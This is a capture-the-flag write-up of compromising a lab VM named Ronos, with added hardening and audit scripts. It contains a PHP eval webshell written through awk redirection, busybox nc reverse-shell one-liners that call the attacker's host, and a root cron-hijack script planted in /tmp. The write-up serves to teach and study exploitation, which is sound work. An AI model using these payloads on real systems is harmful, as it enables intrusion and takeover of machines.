
Ronos (a boot2root box shared by a group friend)

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:b3:17:ee PCS Systemtechnik GmbH
192.168.56.109 08:00:27:b2:b2:cb PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.023 seconds (126.54 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -sC -sV -p- 192.168.56.109
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-09 13:18 +08
Nmap scan report for 192.168.56.109
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: AWK Command Runner
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:B2:B2:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds

Information gathering: opening the site in Firefox shows an online awk command runner. Having done plenty of these, I pointed awk straight at /etc/passwd:

'{ print $0 }' /etc/passwd > 2.txt

The shell redirection at the end writes the output to 2.txt in the web root (the later directory listing from the reverse shell shows it sitting next to index.php), which can then be fetched at
192.168.56.109/2.txt

That returns /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
twansh:x:1000:1000:,,,:/home/twansh:/bin/bash
david:x:1001:1001::/home/david:/bin/bash

Three users with shells: root, twansh and david (when I saw Twansh my brain short-circuited, so I ignored twansh and spent the whole time on david, only to find at the very end that the real flag was sitting under twansh all along (argh, I let my guard down because I thought it was my own ID 😓)).

So the user-group flag can be read straight from /home/twansh/user.txt and written out the same way:

'{ print $0 }' /home/twansh/user.txt > 1.txt

flag{user-0c4da5e7f8a886869575ae0a046f1841}

Since this gives arbitrary file read and write as the web server user, dropping a webshell is the obvious next move.

whatweb shows the backend is PHP, so write a one-line PHP shell and then pop a reverse shell.

The Runoob (菜鸟教程) tutorial's example prints hello world. Add awk's own output redirection, print > "file", and the same construct writes to any file under any directory the web server user can write to; this uses awk's built-in redirection rather than the shell's, so it works even if the shell's > were filtered:

BEGIN { print "Hello, world!" }

So just write it:

'BEGIN { print "<?php @eval($_GET[1])?>" > "shell.php" }'

Open it in Firefox:

http://192.168.56.109/shell.php?1=system(%27id%27);

The id output comes back, confirming code execution as the web user.
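Why the awk runner is a file-write primitive no matter how the shell is handled, as an added example (my own illustration, not the box's PHP or the original post's code; the box's source is not on the page). It tries the same BEGIN-block payload against three hypothetical runner implementations: user text spliced into a shell command (what the box's behaviour implies), the program passed as a single argument with no shell at all, and gawk's --sandbox mode, which refuses output redirection, getline from files or commands, and system().

```shell
#!/bin/sh
# Added illustration, not the box's code: three ways an "awk runner" might
# invoke awk, and whether the print > "file" trick still writes a file.

# 1. What the box's behaviour implies: user text spliced into a shell command.
#    Shell quoting, extra file arguments and `> 2.txt` redirection all work.
run_awk_via_shell() {
    sh -c "awk $1"
}

# 2. "Hardened": program passed as one argv element, no shell involved.
#    Shell metacharacters are dead, but awk's own `print > "file"`,
#    `print | "cmd"` and system() still run as the web server user.
run_awk_no_shell() {
    awk "$1"
}

# 3. gawk --sandbox refuses output redirection, getline from files or
#    commands, and system(). Only gawk has this flag (mawk/busybox awk do not).
run_awk_sandboxed() {
    gawk --sandbox "$1" 2>/dev/null
}

# Feed one runner the payload and report whether a file appeared.
# Prints "written" or "blocked".
probe() {
    runner=$1
    dir=$(mktemp -d)
    target="$dir/shell.php"
    # Same shape as the writeup's payload, with a harmless marker instead of eval.
    prog="BEGIN { print \"written by awk\" > \"$target\" }"
    case $runner in
        run_awk_via_shell) "$runner" "'$prog'" || : ;;   # quoted the way an attacker types it
        *)                 "$runner" "$prog"   || : ;;
    esac
    if [ -f "$target" ]; then echo written; else echo blocked; fi
    rm -rf "$dir"
}

probe run_awk_via_shell      # written
probe run_awk_no_shell       # written: escaping for the shell is not enough
if command -v gawk >/dev/null 2>&1; then
    probe run_awk_sandboxed  # blocked
fi
```

The point of the second runner is the one worth remembering: escapeshellarg-style fixes stop the `> 2.txt` trick but not `print > "file"`, because the redirection is implemented by awk itself. Exposing awk to untrusted input needs a sandboxed interpreter, an OS-level sandbox, or not exposing it at all.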

Next, use busybox to get a reverse shell. Pass it straight as the parameter:

http://192.168.56.109/shell.php?1=system(%27busybox%20nc%20192.168.56.102%207777%20-e%20sh%27);

Listen locally and the shell comes in:

┌──(root㉿kali)-[~]
└─# nc -lnvp 7777
listening on [any] 7777 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.109] 37742
ls
1.txt
2.txt
3.txt
index.php
info.php
note.php
output.txt
sample.txt
shell.php

You can see how many test files I wrote while poking at it, haha.

After that I searched for a long time without result. Only after reading a writeup did I learn that something fishy lives under /opt, namely:

www-data@Ronos:/opt/twansh_pipe$ ls -al
ls -al
total 8
drwxr-xr-x 2 root root 4096 Oct 6 07:45 .
drwxr-xr-x 3 root root 4096 Oct 6 11:15 ..
prw-rw---- 1 twansh www-data 0 Oct 6 07:45 command_pipe

There is a command_pipe. It is a named pipe (the leading p in prw-rw----), presumably the channel some process running as twansh reads its commands from, and since it is owned by twansh but group-writable by www-data, the web shell can write into it. The proper route would be to run pspy to see which process consumes the pipe, then write commands into it to get a shell as twansh. Not necessary here, though, because Hydra brute-forced twansh's password:
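What a command pipe like that usually means in practice, as an added local simulation (my own code, not anything from the box): one process holds the FIFO open and executes every line it reads, so anyone who can write to the pipe, here group www-data, runs commands as the pipe's owner. The reader loop is an assumption about how the twansh-side process on the box behaves; the real consumer is not on the page, and pspy is how you would confirm it.

```shell
#!/bin/sh
# Added simulation of a FIFO "command pipe" like /opt/twansh_pipe/command_pipe.
# Both ends run locally; the reader stands in for the process owned by twansh.

fifo_demo() {
    dir=$(mktemp -d)
    fifo="$dir/command_pipe"
    mkfifo -m 0620 "$fifo"   # box had prw-rw---- twansh:www-data; owner+group write

    # Reader side (assumed behaviour of the twansh process): open the FIFO
    # read-write so it never sees EOF and writers never block, then execute
    # each line. A reader that reopens per line would lose lines in a race.
    (
        exec 3<>"$fifo"
        while IFS= read -r cmd <&3; do
            [ "$cmd" = "__quit__" ] && break
            sh -c "$cmd" >>"$dir/reader.log" 2>&1 || true
        done
    ) &
    reader=$!

    # Writer side: what www-data does after finding the group-writable pipe.
    # Whatever is written here runs with the reader's uid, not ours.
    printf '%s\n' "echo pwned > '$dir/out'" >"$fifo"
    printf '%s\n' "__quit__" >"$fifo"
    wait "$reader"

    result=$(cat "$dir/out" 2>/dev/null || true)
    rm -rf "$dir"
    printf '%s\n' "$result"
}

fifo_demo   # prints: pwned
```

On the real box the writer would be the www-data webshell and the payload a reverse shell line such as the busybox nc one used above; the sentinel and the log file exist only so the demo terminates cleanly.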

twansh@Ronos:~$ id
uid=1000(twansh) gid=1000(twansh) groups=1000(twansh)

And that worked.

Next step: escalate to root.

twansh@Ronos:/$ cd var
twansh@Ronos:/var$ ls
backups cache lib local lock log mail opt run spool tmp www
twansh@Ronos:/var$ cd backups
twansh@Ronos:/var/backups$ ls
alternatives.tar.0 apt.extended_states.1.gz apt.extended_states.3.gz cron.bak dpkg.statoverride.0 group.bak passwd.bak
apt.extended_states.0 apt.extended_states.2.gz apt.extended_states.4.gz dpkg.diversions.0 dpkg.status.0 gshadow.bak shadow.bak
twansh@Ronos:/var/backups$ cat passwd.bak
cat: passwd.bak: Permission denied
twansh@Ronos:/var/backups$ cak cron.bak
-bash: cak: command not found
twansh@Ronos:/var/backups$ cat cron.bak
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
* * * * * /tmp/back.sh

This is exploitable. Here is the AI's explanation:

The five asterisks are, in order: minute, hour, day of month, month, day of week (m h dom mon dow).

* means "any value", i.e. every one.

So * * * * * means run once every minute.

/tmp/back.sh is the command/script path, so this entry runs /tmp/back.sh every minute.

So as long as we plant the script in advance, this scheduled job is under our control and fires every minute. Two caveats: cron.bak is only a backup of a crontab, so the file alone does not prove the job is still installed or whose crontab it is (the root shell below settles that); and the script lives in /tmp, which is world-writable, so any local user can supply it.

twansh@Ronos:/$ cat /tmp/back.sh
cat: /tmp/back.sh: No such file or directory

It doesn't exist yet, so I'll write one:

twansh@Ronos:/$ vim /tmp/back.sh
twansh@Ronos:/$ cat /tmp/back.sh
#!/bin/bash
busybox nc 192.168.56.102 7777 -e /bin/sh

Within a minute the listener catches a root shell. (Cron hands the entry to /bin/sh -c, so if the job calls /tmp/back.sh directly as cron.bak shows, the file needs the execute bit, chmod +x /tmp/back.sh; the transcript above doesn't show that step, so either it happened off-screen or the live job runs the script through an interpreter.)

┌──(root㉿kali)-[~]
└─# nc -lnvp 7777
listening on [any] 7777 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.109] 45322
id
uid=0(root) gid=0(root) groups=0(root)
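The check behind the cron.bak finding, generalized into a small audit script (added here, not part of the original post): for every crontab line it pulls out the absolute paths in the command and flags jobs whose script does not exist but whose directory you can write (the /tmp/back.sh case), or whose script you can already write. The sample crontab is constructed for the demo and points into a temp directory; run the audit as the low-privilege user, because as root everything is writable.

```shell
#!/bin/sh
# Added example: find crontab jobs a low-privilege user can hijack, i.e. the
# /tmp/back.sh pattern. Not from the original writeup.

# Print every absolute path in a crontab line's command part, skipping the
# five time fields (or the single @reboot/@daily field). Interpreters such as
# /bin/sh are reported too: a writable interpreter is just as useful.
cron_abs_paths() {
    set -f                 # no globbing: the time fields are literal '*'
    set -- $1
    case $1 in
        @*) n=1 ;;
        *)  n=5 ;;
    esac
    if [ $# -gt $n ]; then
        shift $n
        for tok in "$@"; do
            case $tok in /*) printf '%s\n' "$tok" ;; esac
        done
    fi
    set +f
}

# Audit a user crontab file (/etc/cron.d entries carry an extra user field,
# not handled here). One finding per line: LEVEL<TAB>path<TAB>crontab line.
cron_audit() {
    file=$1
    while IFS= read -r line || [ -n "$line" ]; do
        set -f; set -- $line; set +f
        [ $# -gt 0 ] || continue
        case $1 in '#'*|*=*) continue ;; esac     # comment or VAR=value
        for path in $(cron_abs_paths "$line"); do
            if [ ! -e "$path" ]; then
                # Script missing: exploitable if we can create it.
                if [ -w "$(dirname "$path")" ]; then
                    printf 'MISSING\t%s\t%s\n' "$path" "$line"
                fi
            elif [ -w "$path" ]; then
                printf 'WRITABLE\t%s\t%s\n' "$path" "$line"
            fi
        done
    done < "$file"
}

# Constructed demo input modelled on the box's cron.bak; all paths point into
# a temp dir so the script runs anywhere.
demo_cron_audit() {
    dir=$(mktemp -d)
    : > "$dir/owned.sh"            # exists and is writable by us
    cat > "$dir/cron.bak" <<EOF
# m h dom mon dow command
PATH=/usr/bin:/bin
* * * * * $dir/back.sh
*/5 * * * * /bin/sh $dir/owned.sh
@daily /usr/bin/env $dir/report.sh
EOF
    cron_audit "$dir/cron.bak"
    rm -rf "$dir"
}

demo_cron_audit
```

Run as twansh on the box this would flag `* * * * * /tmp/back.sh` as MISSING with a writable parent, which is exactly the opening used above. Feed it the live crontabs you can read (cron.bak, /etc/crontab, anything under /var/spool/cron) rather than just the backup.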

The rest needs no explanation, hehe. Done and dusted, and I learned something new.